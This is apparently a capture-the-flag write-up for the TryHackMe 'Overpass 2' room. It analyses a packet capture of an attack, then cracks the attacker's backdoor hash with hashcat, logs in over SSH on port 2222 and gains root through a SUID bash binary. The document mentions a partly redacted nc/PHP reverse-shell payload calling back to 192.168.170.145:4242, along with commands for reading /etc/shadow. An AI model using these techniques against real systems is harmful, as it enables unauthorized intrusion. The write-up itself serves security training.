# Initial Information

> Overpass has been hacked! Can you analyse the attacker's actions and hack back in?

> [room link](https://tryhackme.com/room/overpass2hacked) Created by [NinjaJc01](https://tryhackme.com/p/NinjaJc01)

# Passive analysis

We got a `.pcap` network capture file. The best way to open it is to use `wireshark`.

- [local copy](overpass2.pcapng)

```
$ wireshark overpass2.pcapng
```

- This will open the file in wireshark (a GUI to browse the contents of this type of files)

Our first question is about the URL that attackers used to upload a revshell.  
Looking through wireshark we need to find a http request so we can add a **filter** to show *only http traffic*.
You just need to put `http` into the filter field on top and it will filter out everything that is not http.
In the first row we can see the path!

The second question is about what kind of payload did they use to get a reverse shell.  
We must follow upload.php's http stream and we will find that revshell payload which used nc and php's exec function.

```
<?pXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX192.168.170.145 4242XXXXXXXXXX?>
```

We can see they used port 4242 for the revshell.
Basic nc **revshell traffic can be captured** so we must find it in wireshark.
I sorted by length and I tried to find 4242 in the info.

![4242.png](4242.png)

Following the traffic reveals the password they used in **cleartext**. (`wXXXXXXXXXXXXXXXXXXXXt`)  
We can see the answer to our next question about how the attackers established persistence if we search for `http`. (`hXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXr`)
(They used git to clone a repo which helped them)

Since they used `cat /etc/shadow` we can see user's hashes. We must save them and start cracking them because the attackers probably did the same.

```
$ hashcat -m 1800 -a 0 userhashes.txt rockyou.txt
```

We also have to take a closer look at the backdoor they used because it's in a public git repo!
We can see that a default hash(at the beginning) and a salt(at the end) is hardcoded in the source!

```
hXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXr/blob/master/main.go

bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX3
1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5
```

But the attackers used a different initial hash. We can find it in the nc session in our pcap file.

```
6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd
```

Since we have a hash and a salt we can try to crack it with `hashcat`.

```
$ hashcat -m 1710 -a 0 hash:salt rockyou.txt
$ hashcat -m 1710 -a 0 6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd:1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5 /root/wordlists/kali/rockyou/rockyou.txt
```

```
6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd:1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5:nXXXXXXXX6
```

# Active enumeration

As always, we can start with an nmap scan to discover open ports and services running on these ports.

```
nmap -sC -sV -p- -oN scans/tcpfull 10.10.249.24
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## http - 80/tcp

We can use `curl` to make a GET request to the website and we will find out the attackers defaced the website.

```
curl http://10.10.249.24
<body>
    <div>
        <h1>HXXXXXXXXXXXXXXXXXXXn</h1>
    </div>
    <div>
        <p>Secure your servers!</p>
    </div>
    <div><img src="cooctus.png"></div>
</body>
```

# Foothold - ssh 2222/tcp

Since we know the **port** their backdoor uses and the **password** for it and also the **user** they started the backdoor with we can easily *just ssh into the box*.
```
$ ssh james@10.10.249.24 -p 2222
```

```
$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
```

If we list the files in the current directory we can see a file named `id_rsa` which is the current user's (`james`) private ssh key.
We can copy it to our box to be able to ssh into the box without any password.

***We used wireshark to extract information about how an attacker / attackers compromised the box. This contained enough information so we could just connect to the box with ssh***

```
james@overpass-production:/home/james$ cat user.txt                            
thm{dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX7}
```

# Privilege Escalation from james

I ran [linpeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) in order to discover possible privilege escalation vectors on the box.

```
-rwsr-sr-x 1 root   root       1.1M Jul 22  2020 /home/james/.suid_bash
```

- We found a SUID file owned by root which can be a possible way to root!

```
$ file /home/james/.suid_bash
/home/james/.suid_bash: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=12f73d7a8e226c663034529c8dd20efec22dde54, stripped
```

- A linux binary (ELF) with the name mentioning **bash**

Let's run it and see what happens!

```
$ /home/james/.suid_bash -p
.sudi_bash-4.4# id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(james)
```

- Our `euid=0` which means we have root privileges!

***We used a SUID binary of bash owned by root here which allowed us to become the root user very easily!***

```
cat /root/root.txt
thm{dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd}
```
